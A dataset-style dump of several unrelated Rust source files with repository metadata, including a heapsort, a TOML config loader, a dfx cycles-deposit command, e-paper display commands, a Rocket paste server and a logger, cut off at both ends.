    // Debug dump of the winning deck, kept from the original.
    println!("{:?}", winner);
    winner
        .iter()
        .enumerate()
        .map(|(i, v)| v * (winner.len() - i))
        .sum()
}
| true |
10419ff81fa91529b9cc7565a26cc3e9e61cf9b0
|
Rust
|
Hsiaopan/rust_learning
|
/algo-heapsort/src/main.rs
|
UTF-8
| 1,057 | 3.6875 | 4 |
[] |
no_license
|
/// Sorts the slice in place with heapsort and returns it for chaining.
///
/// Generalized from `&mut [i32]` to any `T: Ord`; existing callers with
/// `i32` slices are unaffected. Runs in O(n log n) time with O(1) extra
/// space, and handles empty and single-element slices.
pub fn heapsort<T: Ord>(arr: &mut [T]) -> &mut [T] {
    let end = arr.len();
    // Heapify: sift down every non-leaf node, from the last parent
    // upward, producing a valid max-heap over the whole slice.
    for start in (0..end / 2).rev() {
        sift_down(arr, start, end - 1);
    }
    // Sort: repeatedly swap the max (root) into the end of the unsorted
    // region, then restore the heap property on the shrunken prefix.
    for end in (1..arr.len()).rev() {
        arr.swap(end, 0);
        sift_down(arr, 0, end - 1);
    }
    arr
}
/// Restores the max-heap property for the subtree rooted at `start`,
/// considering only indices `start..=end` (inclusive bound).
fn sift_down<T: Ord>(arr: &mut [T], start: usize, end: usize) {
    let mut root = start;
    loop {
        let mut child = root * 2 + 1;
        if child > end {
            break; // `root` is a leaf within the heap bounds.
        }
        // Choose the larger of the two children, if a right child exists.
        if child + 1 <= end && arr[child] < arr[child + 1] {
            child += 1;
        }
        if arr[root] < arr[child] {
            arr.swap(root, child);
            root = child; // Continue sifting from the swapped position.
        } else {
            break; // Heap property already holds here.
        }
    }
}
/// Demo entry point: prints a sample array before and after heapsort.
fn main() {
    let mut sample = [1, 5, 7, 3, 9, 11, 2, 3, 6, 12, 8];
    println!("{:?}", sample);
    println!("{:?}", heapsort(&mut sample));
}
| true |
5ede057063e2056556736a76f372bbba2b55d46e
|
Rust
|
udoprog/sysmon-rs
|
/src/config.rs
|
UTF-8
| 6,057 | 2.578125 | 3 |
[
"Apache-2.0"
] |
permissive
|
use serde;
use plugin::*;
use errors::*;
use std::sync::Arc;
use std::cell::RefCell;
use std::rc::Rc;
use std::fs;
use std::io::Read;
use toml;
use num_cpus;
use futures_cpupool::*;
use tokio_core;
use std::time::Duration;
/// Runtime configuration for the monitor, with defaults applied.
pub struct Config {
    /// Number of threads to configure in thread pool.
    threads: usize,
    /// If the threads option is per cpu or not.
    threads_per_cpu: bool,
    /// Interval at which to perform updates.
    pub update_interval: Duration,
    /// Interval at which to perform polling.
    pub poll_interval: Duration,
}
/// Model used to parse configuration file.
/// Same as Config, but with optional fields to allow leaving them unspecified.
#[derive(Deserialize, Debug)]
pub struct ConfigIn {
    threads: Option<usize>,
    threads_per_cpu: Option<bool>,
    update_interval: Option<Duration>,
    poll_interval: Option<Duration>,
}
/// Shared runtime handles (thread pool + reactor) from which per-plugin
/// contexts are derived.
pub struct PartialPluginContext {
    cpupool: Arc<CpuPool>,
    core: Rc<RefCell<tokio_core::reactor::Core>>,
}
impl PartialPluginContext {
    /// Bundles the shared runtime handles.
    pub fn new(
        cpupool: Arc<CpuPool>,
        core: Rc<RefCell<tokio_core::reactor::Core>>,
    ) -> PartialPluginContext {
        PartialPluginContext {
            cpupool: cpupool,
            core: core,
        }
    }
    /// Derives a plugin-specific context that borrows the plugin's id and
    /// config table while sharing (cloning) the pool/reactor handles.
    fn build<'a>(&self, id: &'a String, config: &'a toml::Table) -> PluginContext<'a> {
        PluginContext {
            id: id,
            config: config,
            cpupool: self.cpupool.clone(),
            core: self.core.clone(),
        }
    }
}
/// Deferred plugin construction: given the final config, the plugin
/// registry and the shared runtime handles, instantiate all configured
/// input and output plugins.
pub type PluginSetup = Fn(&Config, &PluginRegistry, &PartialPluginContext)
    -> Result<(Vec<Arc<Box<InputInstance>>>, Vec<Box<OutputInstance>>)>;
impl Config {
    /// Builds a `Config` populated with the built-in defaults.
    pub fn new() -> Config {
        // defaults
        Config {
            threads: 4,
            threads_per_cpu: false,
            update_interval: Duration::new(1, 0),
            poll_interval: Duration::new(10, 0),
        }
    }
    /// Effective thread-pool size: an absolute count, or a per-CPU-core
    /// multiplier when `threads_per_cpu` is set.
    pub fn threads(&self) -> usize {
        if self.threads_per_cpu {
            return num_cpus::get() * self.threads;
        }
        self.threads
    }
}
/// Instantiates a single plugin from its TOML table: reads the mandatory
/// `type` field, looks up the matching plugin entry via `load`, constructs
/// the plugin and hands the full table to `setup`.
fn load_instance<Entry, Instance, Load, Plugin, Setup>(
    id: &String,
    plugin_section: toml::Value,
    load: Load,
    setup: Setup,
) -> Result<Instance>
where
    Entry: Fn() -> Result<Plugin>,
    Load: Fn(&String) -> Option<Entry>,
    Setup: Fn(Plugin, &String, &toml::Table) -> Result<Instance>,
{
    let plugin_table: toml::Table = toml::decode(plugin_section).ok_or(ErrorKind::TomlDecode)?;
    // `type` selects which registered plugin implementation to build.
    let plugin_type: String = plugin_table
        .get("type")
        .map(Clone::clone)
        .and_then(toml::decode)
        .ok_or(ErrorKind::MissingField("type".to_owned()))?;
    let entry = load(&plugin_type).ok_or(
        ErrorKind::MissingPlugin(plugin_type),
    )?;
    let plugin = entry()?;
    setup(plugin, id, &plugin_table)
}
/// Loads every `<id> = { ... }` entry of a config section, producing one
/// plugin instance per entry; failures are annotated with the offending id.
fn load_section<Entry, Instance, Load, Plugin, Setup>(
    section: &toml::Value,
    load: Load,
    setup: Setup,
) -> Result<Vec<Instance>>
where
    Entry: Fn() -> Result<Plugin>,
    Load: Fn(&String) -> Option<Entry>,
    Setup: Fn(Plugin, &String, &toml::Table) -> Result<Instance>,
{
    let mut values: Vec<Instance> = Vec::new();
    let table: toml::Table = toml::decode(section.clone()).ok_or(ErrorKind::TomlDecode)?;
    for (id, plugin_section) in table {
        values.push(load_instance(&id, plugin_section.clone(), &load, &setup)
            .chain_err(|| ErrorKind::ConfigSection(id))?);
    }
    Ok(values)
}
/// Read optional fields from input configuration.
macro_rules! read_config {
    ( $config:ident, $config_in:ident, [$($field:ident),*] ) => {
        $(
            // Copy each optional field into the config only when present.
            if let Some($field) = $config_in.$field {
                $config.$field = $field;
            }
        )*
    };
}
/// Parses the TOML config file at `path`, applying its values on top of
/// `config`, and returns a closure that instantiates the configured
/// input/output plugins once a registry and runtime context exist.
pub fn load_config(config: &mut Config, path: &String) -> Result<Box<PluginSetup>> {
    let mut file = fs::File::open(path)?;
    let mut content = String::new();
    file.read_to_string(&mut content)?;
    let mut parser = toml::Parser::new(&mut content);
    let root = match parser.parse() {
        Some(value) => value,
        None => return Err(ErrorKind::TomlParse(parser.errors).into()),
    };
    // Deserialize the optional top-level fields into ConfigIn.
    let config_in: ConfigIn = {
        let mut decoder = toml::Decoder::new(toml::Value::Table(root.clone()));
        serde::Deserialize::deserialize(&mut decoder)
    }?;
    // `threads` is validated by hand (must be positive) before applying.
    if let Some(threads) = config_in.threads {
        if threads <= 0 {
            return Err(
                ErrorKind::ConfigField(
                    "threads".to_owned(),
                    "must be a positive number".to_owned(),
                ).into(),
            );
        }
        config.threads = threads;
    }
    read_config!(
        config,
        config_in,
        [threads_per_cpu, update_interval, poll_interval]
    );
    // Keep the raw `in`/`out` sections; plugin construction is deferred
    // until the returned closure is invoked.
    let mut input_configs = Vec::new();
    let mut output_configs = Vec::new();
    if let Some(i) = root.get("in") {
        input_configs.push(i.clone());
    }
    if let Some(o) = root.get("out") {
        output_configs.push(o.clone());
    }
    Ok(Box::new(move |_config, plugins, partial_context| {
        let mut inputs: Vec<Arc<Box<InputInstance>>> = Vec::new();
        let mut outputs: Vec<Box<OutputInstance>> = Vec::new();
        for i in input_configs.iter() {
            let loaded = load_section(&i, |plugin_type| plugins.get_input(plugin_type), |plugin,
                                                                                         id,
                                                                                         config| {
                plugin.setup(partial_context.build(id, config)).map(
                    Arc::new,
                )
            }).chain_err(|| ErrorKind::ConfigSection("in".to_owned()))?;
            inputs.extend(loaded);
        }
        for o in output_configs.iter() {
            let loaded = load_section(&o, |plugin_type| plugins.get_output(plugin_type), |plugin,
                                                                                          id,
                                                                                          config| {
                plugin.setup(partial_context.build(id, config))
            }).chain_err(|| ErrorKind::ConfigSection("out".to_owned()))?;
            outputs.extend(loaded);
        }
        Ok((inputs, outputs))
    }))
}
| true |
b3a8e539b7ad2cd5f33f62cb33918990e54c1629
|
Rust
|
jplevyak/sdk
|
/src/dfx/src/commands/canister/deposit_cycles.rs
|
UTF-8
| 2,803 | 2.59375 | 3 |
[
"Apache-2.0"
] |
permissive
|
use crate::lib::environment::Environment;
use crate::lib::error::DfxResult;
use crate::lib::identity::identity_utils::CallSender;
use crate::lib::models::canister_id_store::CanisterIdStore;
use crate::lib::operations::canister;
use crate::lib::root_key::fetch_root_key_if_needed;
use crate::util::clap::validators::cycle_amount_validator;
use crate::util::expiry_duration;
use anyhow::bail;
use clap::Clap;
use ic_types::Principal;
use slog::info;
use std::time::Duration;
/// Deposit cycles into the specified canister.
/// Deposit cycles into the specified canister.
#[derive(Clap)]
pub struct DepositCyclesOpts {
    /// Specifies the amount of cycles to send on the call.
    /// Deducted from the wallet.
    #[clap(validator(cycle_amount_validator))]
    cycles: String,
    /// Specifies the name or id of the canister to receive the cycles deposit.
    /// You must specify either a canister name/id or the --all option.
    canister: Option<String>,
    /// Deposit cycles to all of the canisters configured in the dfx.json file.
    #[clap(long, required_unless_present("canister"))]
    all: bool,
}
/// Deposits `cycles` into a single canister (identified by textual
/// principal or by a name known to the canister id store) and logs the
/// post-deposit balance.
async fn deposit_cycles(
    env: &dyn Environment,
    canister: &str,
    timeout: Duration,
    call_sender: &CallSender,
    cycles: u64,
) -> DfxResult {
    let log = env.get_logger()
    ;
    let canister_id_store = CanisterIdStore::for_env(env)?;
    // Accept either a raw principal or a configured canister name.
    let canister_id =
        Principal::from_text(canister).or_else(|_| canister_id_store.get(canister))?;
    info!(log, "Depositing {} cycles onto {}", cycles, canister,);
    canister::deposit_cycles(env, canister_id.clone(), timeout, call_sender, cycles).await?;
    // Re-query status so the user sees the updated balance.
    let status = canister::get_canister_status(env, canister_id, timeout, call_sender).await?;
    info!(
        log,
        "Deposited {} cycles, updated balance: {} cycles", cycles, status.cycles
    );
    Ok(())
}
/// CLI entry point: requires a wallet call sender, then deposits to the
/// named canister or, with `--all`, to every canister in dfx.json.
pub async fn exec(
    env: &dyn Environment,
    opts: DepositCyclesOpts,
    call_sender: &CallSender,
) -> DfxResult {
    if call_sender == &CallSender::SelectedId {
        bail!("The deposit cycles call needs to proxied via the wallet canister. Invoke this command without the `--no-wallet` flag.");
    }
    // amount has been validated by cycle_amount_validator
    let cycles = opts.cycles.parse::<u64>().unwrap();
    let config = env.get_config_or_anyhow()?;
    fetch_root_key_if_needed(env).await?;
    let timeout = expiry_duration();
    if let Some(canister) = opts.canister.as_deref() {
        deposit_cycles(env, &canister, timeout, call_sender, cycles).await
    } else if opts.all {
        if let Some(canisters) = &config.get_config().canisters {
            for canister in canisters.keys() {
                deposit_cycles(env, &canister, timeout, call_sender, cycles).await?;
            }
        }
        Ok(())
    } else {
        // clap guarantees either a canister name or `--all` was provided.
        unreachable!()
    }
}
| true |
4b2ba0eba187bfd7315a4b0e2aaf0468efe797b8
|
Rust
|
ZhongliGao/memtable-rs
|
/memtable-core/src/capacity.rs
|
UTF-8
| 848 | 3.515625 | 4 |
[
"LicenseRef-scancode-unknown-license-reference",
"MIT",
"Apache-2.0"
] |
permissive
|
/// The capacity of the list: either bounded by a maximum size or unbounded.
#[derive(Copy, Clone, Debug, PartialEq, Eq, PartialOrd, Ord, Hash)]
#[cfg_attr(feature = "serde-1", derive(serde::Serialize, serde::Deserialize))]
pub enum Capacity {
    /// Represents a capacity that has a maximum bounds
    Limited(usize),
    /// Represents a capacity with no bounds
    Unlimited,
}
impl Capacity {
    /// Returns true if the capacity is unlimited
    pub fn is_unlimited(self) -> bool {
        match self {
            Self::Unlimited => true,
            Self::Limited(_) => false,
        }
    }
    /// Returns true if the capacity is limited
    pub fn is_limited(self) -> bool {
        !self.is_unlimited()
    }
    /// Returns the limit associated with the capacity if it has one
    pub fn limit(self) -> Option<usize> {
        if let Self::Limited(max) = self {
            Some(max)
        } else {
            None
        }
    }
}
| true |
b945ff90cc63c7aacba870ed588cc940e39ec1df
|
Rust
|
caemor/epd-waveshare
|
/src/epd2in13_v2/command.rs
|
UTF-8
| 6,872 | 2.796875 | 3 |
[
"ISC"
] |
permissive
|
//! SPI Commands for the Waveshare 2.13" v2
use crate::traits;
extern crate bit_field;
use bit_field::BitField;
/// Epd2in13 v2
///
/// For more infos about the addresses and what they are doing look into the pdfs
#[allow(dead_code)]
#[derive(Copy, Clone)]
pub(crate) enum Command {
    // Each variant's discriminant is the raw SPI command/register address
    // sent to the display controller (see `traits::Command::address`).
    DriverOutputControl = 0x01,
    GateDrivingVoltageCtrl = 0x03,
    SourceDrivingVoltageCtrl = 0x04,
    BoosterSoftStartControl = 0x0C,
    GateScanStartPosition = 0x0F,
    DeepSleepMode = 0x10,
    DataEntryModeSetting = 0x11,
    SwReset = 0x12,
    HvReadyDetection = 0x14,
    VciDetection = 0x15,
    TemperatureSensorControlWrite = 0x1A,
    TemperatureSensorControlRead = 0x1B,
    TemperatureSensorExtControlWrite = 0x1C,
    MasterActivation = 0x20,
    DisplayUpdateControl1 = 0x21,
    DisplayUpdateControl2 = 0x22,
    // RAM access: 0x24 is the black/white plane, 0x26 the red plane.
    WriteRam = 0x24,
    WriteRamRed = 0x26,
    ReadRam = 0x27,
    VcomSense = 0x28,
    VcomSenseDuration = 0x29,
    ProgramVcomOpt = 0x2A,
    WriteVcomRegister = 0x2C,
    OtpRegisterRead = 0x2D,
    StatusBitRead = 0x2F,
    ProgramWsOtp = 0x30,
    LoadWsOtp = 0x31,
    WriteLutRegister = 0x32,
    ProgramOtpSelection = 0x36,
    WriteOtpSelection = 0x37,
    SetDummyLinePeriod = 0x3A,
    SetGateLineWidth = 0x3B,
    BorderWaveformControl = 0x3C,
    ReadRamOption = 0x41,
    SetRamXAddressStartEndPosition = 0x44,
    SetRamYAddressStartEndPosition = 0x45,
    AutoWriteRedRamRegularPattern = 0x46,
    AutoWriteBwRamRegularPattern = 0x47,
    SetRamXAddressCounter = 0x4E,
    SetRamYAddressCounter = 0x4F,
    SetAnalogBlockControl = 0x74,
    SetDigitalBlockControl = 0x7E,
    Nop = 0x7F,
}
/// Payload of the DriverOutputControl command.
pub(crate) struct DriverOutput {
    pub scan_is_linear: bool,
    pub scan_g0_is_first: bool,
    pub scan_dir_incr: bool,
    pub width: u16,
}
impl DriverOutput {
    /// Serializes the setting as the controller expects it: width low
    /// byte, width high byte, then a flags byte where bit 0 is set when
    /// the scan direction does *not* increment, bit 1 when G0 is *not*
    /// first, and bit 2 when the scan is *not* linear.
    pub fn to_bytes(&self) -> [u8; 3] {
        let mut flags = 0u8;
        if !self.scan_dir_incr {
            flags |= 1 << 0;
        }
        if !self.scan_g0_is_first {
            flags |= 1 << 1;
        }
        if !self.scan_is_linear {
            flags |= 1 << 2;
        }
        [self.width as u8, (self.width >> 8) as u8, flags]
    }
}
/// These are not directly documented, but the bitfield is easily reversed from
/// documentation and sample code
/// [7|6|5|4|3|2|1|0]
/// | | | | | | | `--- disable clock
/// | | | | | | `----- disable analog
/// | | | | | `------- display
/// | | | | `--------- undocumented and unknown use,
/// | | | | but used in waveshare reference code
/// | | | `----------- load LUT
/// | | `------------- load temp
/// | `--------------- enable clock
/// `----------------- enable analog
pub(crate) struct DisplayUpdateControl2(pub u8);
#[allow(dead_code)]
impl DisplayUpdateControl2 {
    /// Starts with every stage disabled (all bits clear).
    pub fn new() -> DisplayUpdateControl2 {
        DisplayUpdateControl2(0x00)
    }
    pub fn disable_clock(mut self) -> Self {
        self.0 |= 1 << 0;
        self
    }
    pub fn disable_analog(mut self) -> Self {
        self.0 |= 1 << 1;
        self
    }
    pub fn display(mut self) -> Self {
        self.0 |= 1 << 2;
        self
    }
    pub fn load_lut(mut self) -> Self {
        self.0 |= 1 << 4;
        self
    }
    pub fn load_temp(mut self) -> Self {
        self.0 |= 1 << 5;
        self
    }
    pub fn enable_clock(mut self) -> Self {
        self.0 |= 1 << 6;
        self
    }
    pub fn enable_analog(mut self) -> Self {
        self.0 |= 1 << 7;
        self
    }
}
// Address-counter auto-increment/decrement directions for the
// DataEntryModeSetting command (X and Y handled independently).
#[allow(dead_code, clippy::enum_variant_names)]
pub(crate) enum DataEntryModeIncr {
    XDecrYDecr = 0x0,
    XIncrYDecr = 0x1,
    XDecrYIncr = 0x2,
    XIncrYIncr = 0x3,
}
// Which axis the address counter advances along first.
#[allow(dead_code)]
pub(crate) enum DataEntryModeDir {
    XDir = 0x0,
    YDir = 0x4,
}
#[allow(dead_code)]
#[derive(Copy, Clone)]
pub(crate) enum BorderWaveFormVbd {
    Gs = 0x0,
    FixLevel = 0x1,
    Vcom = 0x2,
}
#[allow(dead_code)]
#[derive(Copy, Clone)]
pub(crate) enum BorderWaveFormFixLevel {
    Vss = 0x0,
    Vsh1 = 0x1,
    Vsl = 0x2,
    Vsh2 = 0x3,
}
#[allow(dead_code)]
#[derive(Copy, Clone)]
pub(crate) enum BorderWaveFormGs {
    Lut0 = 0x0,
    Lut1 = 0x1,
    Lut2 = 0x2,
    Lut3 = 0x3,
}
/// Border waveform control register value, packed as bits 7..6 = vbd,
/// bits 5..4 = fix_level, bits 1..0 = gs_trans (bits 3..2 stay zero).
pub(crate) struct BorderWaveForm {
    pub vbd: BorderWaveFormVbd,
    pub fix_level: BorderWaveFormFixLevel,
    pub gs_trans: BorderWaveFormGs,
}
impl BorderWaveForm {
    /// Packs the three fields into the register byte with plain shifts;
    /// every discriminant fits in its two-bit field.
    pub fn to_u8(&self) -> u8 {
        ((self.vbd as u8) << 6) | ((self.fix_level as u8) << 4) | (self.gs_trans as u8)
    }
}
#[allow(dead_code)]
#[derive(Copy, Clone)]
pub enum DeepSleepMode {
    // Sleeps and keeps access to RAM and controller
    Normal = 0x00,
    // Sleeps without access to RAM/controller but keeps RAM content
    Mode1 = 0x01,
    // Same as MODE_1 but RAM content is not kept
    Mode2 = 0x11,
}
// Newtype wrappers around raw register bytes, so the different voltage
// registers cannot be mixed up at call sites.
pub(crate) struct GateDrivingVoltage(pub u8);
pub(crate) struct SourceDrivingVoltage(pub u8);
pub(crate) struct Vcom(pub u8);
// Conversions from integer voltage specifications into register
// encodings; see the `impl` below for the accepted input ranges.
pub(crate) trait I32Ext {
    fn vcom(self) -> Vcom;
    fn gate_driving_decivolt(self) -> GateDrivingVoltage;
    fn source_driving_decivolt(self) -> SourceDrivingVoltage;
}
impl I32Ext for i32 {
    // This is really not very nice. Until I find something better, this will be
    // a placeholder.
    /// Encodes a VCOM setting (accepted range -30..=-2; presumably tenths
    /// of a volt, i.e. -0.2V..-3.0V — confirm against the controller
    /// datasheet) into its register byte. Panics on out-of-range input.
    fn vcom(self) -> Vcom {
        assert!((-30..=-2).contains(&self));
        // Non-linear lookup table; values appear to come straight from
        // the vendor datasheet and are not derivable arithmetically.
        let u = match -self {
            2 => 0x08,
            3 => 0x0B,
            4 => 0x10,
            5 => 0x14,
            6 => 0x17,
            7 => 0x1B,
            8 => 0x20,
            9 => 0x24,
            10 => 0x28,
            11 => 0x2C,
            12 => 0x2F,
            13 => 0x34,
            14 => 0x37,
            15 => 0x3C,
            16 => 0x40,
            17 => 0x44,
            18 => 0x48,
            19 => 0x4B,
            20 => 0x50,
            21 => 0x54,
            22 => 0x58,
            23 => 0x5B,
            24 => 0x5F,
            25 => 0x64,
            26 => 0x68,
            27 => 0x6C,
            28 => 0x6F,
            29 => 0x73,
            30 => 0x78,
            // Unreachable given the assert above; keeps the match total.
            _ => 0,
        };
        Vcom(u)
    }
    /// Converts a gate driving voltage in decivolts (100..=210 in steps
    /// of 5, i.e. 10.0V..21.0V) into its register encoding. Panics on
    /// out-of-range or misaligned input.
    fn gate_driving_decivolt(self) -> GateDrivingVoltage {
        assert!((100..=210).contains(&self) && self % 5 == 0);
        GateDrivingVoltage(((self - 100) / 5 + 0x03) as u8)
    }
    /// Converts a source driving voltage in decivolts into its register
    /// encoding; accepts 24..=88 in 0.1V steps, or +/-90..=180 in 0.5V
    /// steps (the final branch handles the negative range).
    fn source_driving_decivolt(self) -> SourceDrivingVoltage {
        assert!((24..=88).contains(&self) || (self % 5 == 0 && (90..=180).contains(&self.abs())));
        if (24..=88).contains(&self) {
            SourceDrivingVoltage(((self - 24) + 0x8E) as u8)
        } else if (90..=180).contains(&self) {
            SourceDrivingVoltage(((self - 90) / 2 + 0x23) as u8)
        } else {
            SourceDrivingVoltage((((-self - 90) / 5) * 2 + 0x1A) as u8)
        }
    }
}
impl traits::Command for Command {
    /// Returns the address of the command
    fn address(self) -> u8 {
        // Variants carry their register address as the discriminant, so
        // the cast is the identity mapping to the wire value.
        self as u8
    }
}
| true |
fb06622a0d953880b8045215e89167c33ed45cf8
|
Rust
|
ioncodes/thicc
|
/src/server.rs
|
UTF-8
| 2,093 | 2.65625 | 3 |
[] |
no_license
|
use rocket::response::{Redirect, NamedFile};
use rocket::Config;
use rocket::config::Environment;
use rocket::response::content::Html;
use rocket_contrib::json::Json;
use rocket_contrib::serve::StaticFiles;
use askama::Template;
use crate::db::Db;
use crate::constants::{PROTOCOL, HOSTNAME, PORT};
use crate::create_template::CreateTemplate;
use crate::paste_template::PasteTemplate;
use crate::paste::Paste;
use std::path::Path;
/// Marker type for the web server; all request state lives in the routes.
pub struct Server { }
/// Serves the paste-creation page, templating in the public base URL.
#[get("/create")]
fn create_html() -> Html<String> {
    let template = CreateTemplate { protocol: PROTOCOL, host: HOSTNAME, port: &PORT.to_string()[..] }
    ;
    Html(template.render().unwrap())
}
/// Stores a new paste (JSON body) and returns its generated id.
#[post("/create", format = "application/json", data = "<paste>")]
fn create_paste(paste: Json<Paste>) -> String {
    let id = Db::create_paste(paste.0);
    id
}
/// Renders a stored paste with syntax highlighting for its language.
#[get("/<id>")]
fn paste(id: String) -> Html<String> {
    let paste = Db::get_paste(id);
    let language: &str = &paste.language;
    // Stored paste bodies are URL-encoded then base64-encoded, so decode
    // base64 first and undo the percent-encoding after.
    let decoded = String::from(std::str::from_utf8(&base64::decode(&paste.code).unwrap()).unwrap());
    let code = &urldecode::decode(decoded)[..];
    let template = PasteTemplate { code , language };
    Html(template.render().unwrap())
}
/// Returns the raw (fully decoded) paste body as plain text.
#[get("/<id>/raw")]
fn paste_raw(id: String) -> String {
    let paste = Db::get_paste(id);
    let decoded = String::from(std::str::from_utf8(&base64::decode(&paste.code).unwrap()).unwrap());
    let code = urldecode::decode(decoded);
    code
}
/// Serves the site favicon from the static assets directory.
#[get("/favicon.ico")]
fn icon() -> Option<NamedFile> {
    NamedFile::open(Path::new("static/icons/favicon.ico")).ok()
}
impl Server {
    /// Creates the (stateless) server wrapper.
    pub fn new() -> Server { Server { } }
    /// Initializes the database, then launches rocket on 0.0.0.0:7000
    /// with the static mounts and routes. Blocks for the lifetime of the
    /// server.
    pub fn start(&self) {
        Db::initialize();
        let config = Config::build(Environment::Staging)
            .address("0.0.0.0")
            .port(7000)
            .finalize()
            .unwrap();
        rocket::custom(config)
            .mount("/js", StaticFiles::from("static/js"))
            .mount("/css", StaticFiles::from("static/css"))
            .mount("/", routes![create_html, create_paste, paste, paste_raw, icon])
            .launch();
    }
}
| true |
0047af285b5e7e7354b94cc8feb95c97142a587d
|
Rust
|
rodrimati1992/zeroable_crates
|
/zeroable_derive/src/repr_attr.rs
|
UTF-8
| 2,575 | 2.828125 | 3 |
[
"MIT",
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] |
permissive
|
use crate::attribute_parsing_shared::with_nested_meta;
use quote::ToTokens;
use syn::{Meta, NestedMeta};
////////////////////////////////////////////////////////////////////////////////
/// The effective `#[repr(...)]` of a type, reduced to the cases the
/// derive distinguishes.
#[derive(Debug, Copy, Clone, PartialEq)]
#[allow(dead_code)]
pub(crate) enum ReprAttr {
    /// `#[repr(C)]`, possibly combined with an integer repr.
    C { integer_repr: bool },
    /// An integer repr (e.g. `#[repr(u8)]`) without `C`.
    IntegerRepr,
    /// `#[repr(transparent)]`.
    Transparent,
    /// No recognized repr hint: the default Rust layout.
    Rust,
}
/// Accumulates which repr hints were seen while walking the attribute's
/// nested metas; collapsed into a `ReprAttr` at the end of `new`.
#[derive(Copy, Clone)]
pub(crate) struct ReprAttrBuilder {
    c: bool,
    integer: bool,
    transparent: bool,
}
impl ReprAttr {
    /// Parses the nested metas of one `#[repr(...)]` attribute into a
    /// `ReprAttr`, erroring on unrecognized hints. `align(..)` lists are
    /// accepted and ignored.
    pub fn new<I>(iter: I) -> Result<Self, syn::Error>
    where
        I: IntoIterator<Item = NestedMeta>,
    {
        const REPR_RUST: ReprAttrBuilder = ReprAttrBuilder {
            c: false,
            integer: false,
            transparent: false,
        };
        let mut this = REPR_RUST;
        fn inner_err(tokens: &dyn ToTokens) -> syn::Error {
            spanned_err!(tokens, "Unrecognized repr attribute")
        }
        with_nested_meta("repr", iter, |attr| match attr {
            // Bare path hints: `C`, `transparent`, or an integer type.
            Meta::Path(ref path) => {
                let ident = path.get_ident().ok_or_else(|| inner_err(path))?;
                if ident == "C" {
                    this.c = true;
                } else if ident == "transparent" {
                    this.transparent = true;
                } else if is_integer_type(ident) {
                    this.integer = true;
                } else {
                    return Err(inner_err(ident));
                }
                Ok(())
            }
            // `align(N)` is valid but irrelevant here.
            Meta::List(ref list) if list.path.is_ident("align") => Ok(()),
            x => Err(inner_err(&x)),
        })?;
        // Ignoring these invalid combinations because Rust already
        // emits an error for them:
        // - #[repr(transparent,C)]
        // - #[repr(transparent,<integer_type>)]
        match (this.c, this.integer, this.transparent) {
            (true, integer_repr, _) => Ok(ReprAttr::C { integer_repr }),
            (false, true, _) => Ok(ReprAttr::IntegerRepr),
            (false, false, true) => Ok(ReprAttr::Transparent),
            (false, false, false) => Ok(ReprAttr::Rust),
        }
    }
}
/// Expands to a `match` comparing `$matches` against each listed repr
/// name, yielding `true` on the first equal one and `false` otherwise.
macro_rules! matches_one_integer_repr {
    ( $matches:ident => $( $repr:expr ),* $(,)* ) => (
        match () {
            $(() if $matches == $repr => true,)*
            _=>false
        }
    )
}
/// Whether `ident` names one of Rust's primitive integer types that are
/// valid inside `#[repr(...)]`.
fn is_integer_type(ident: &syn::Ident) -> bool {
    matches_one_integer_repr! {
        ident=>
        "u8","i8",
        "u16","i16",
        "u32","i32",
        "u64","i64",
        "u128","i128",
        "usize","isize",
    }
}
| true |
b012cb5891909a401ae35f83aa4100318085b564
|
Rust
|
Rolledm/sip-server-rust
|
/src/logger.rs
|
UTF-8
| 1,973 | 3.484375 | 3 |
[] |
no_license
|
use lazy_static::lazy_static;
use std::sync::Mutex;
use chrono::Utc;
use std::fs::File;
use std::io::prelude::*;
lazy_static! {
static ref LOGGER: Mutex<Option<Logger>> = Mutex::new(None);
}
/// The available log levels, from least (`Debug`) to most (`Fatal`)
/// severe.
#[derive(Debug)]
pub enum Severity {
    Debug,
    Info,
    Warning,
    Error,
    Fatal,
}
/// Maps a severity to its numeric rank, 1 (`Fatal`) through 5 (`Debug`);
/// lower numbers are more severe.
fn severity_to_number(severity: Severity) -> u32 {
    match severity {
        Severity::Debug => 5,
        Severity::Info => 4,
        Severity::Warning => 3,
        Severity::Error => 2,
        Severity::Fatal => 1,
    }
}
/// Maps a numeric severity rank back to its display label; unknown ranks
/// map to the empty string.
fn number_to_string(number: u32) -> &'static str {
    const NAMES: [&str; 5] = ["FATAL", "ERROR", "WARNING", "INFO", "DEBUG"];
    match number {
        1..=5 => NAMES[(number - 1) as usize],
        _ => "",
    }
}
/// Global logger state: the configured severity threshold (numeric, see
/// `severity_to_number`) and the open log file.
#[derive(Debug)]
pub struct Logger {
    max_severity: u32,
    file: File,
}
/// Convenience wrapper: logs `text` through the global logger. Silently
/// does nothing when the logger has not been initialized.
pub fn log(severity: Severity, text: &str) {
    let mut logger = Logger::get_instance().lock().unwrap();
    match &mut *logger {
        None => (),
        Some(logger) => logger.log(severity_to_number(severity), text),
    };
}
impl Logger {
    /// Creates the global logger, writing to `file` and filtering out
    /// messages less severe than `max_severity`.
    ///
    /// # Panics
    /// Panics if called more than once, or if the log file cannot be
    /// created.
    pub fn init(max_severity: Severity, file: &str) {
        let mut logger = LOGGER.lock().unwrap();
        if logger.is_none() {
            *logger = Some(Logger {
                max_severity: severity_to_number(max_severity),
                file: File::create(file).unwrap(),
            });
        } else {
            panic!("Logger already initialized!")
        }
    }
    /// Returns the global logger cell.
    ///
    /// # Panics
    /// Panics if `init` has not been called yet.
    pub fn get_instance() -> &'static Mutex<Option<Self>> {
        if LOGGER.lock().unwrap().is_some() {
            &LOGGER
        } else {
            panic!("Logger not initialized!")
        }
    }
    /// Writes `text` (prefixed with level and UTC time) to stdout and the
    /// log file when `severity` is within the configured threshold
    /// (lower number = more severe).
    pub fn log(&mut self, severity: u32, text: &str) {
        if severity <= self.max_severity {
            let message = format!("{} | {} | {}\n", number_to_string(severity), Utc::now().format("%H:%M:%S"), text);
            print!("{}", message);
            // `write_all` instead of `write`: a bare `write` may perform
            // a partial write and silently drop the rest of the message.
            self.file.write_all(message.as_bytes()).unwrap();
        }
    }
}
| true |
11ef92471a9fb92ace20c121e21ffeb8f90639ec
|
Rust
|
Dragoteryx/brainfuck
|
/src/memory/memory32.rs
|
UTF-8
| 1,907 | 3.203125 | 3 |
[] |
no_license
|
use crate::{Args, Error, Memory};
/// Fixed-size tape of 32-bit cells plus a data pointer, parameterised by
/// the runtime options in `Args`.
#[derive(Debug)]
pub struct Memory32<'a> {
    // Tape cells; zero-initialised, length fixed at construction.
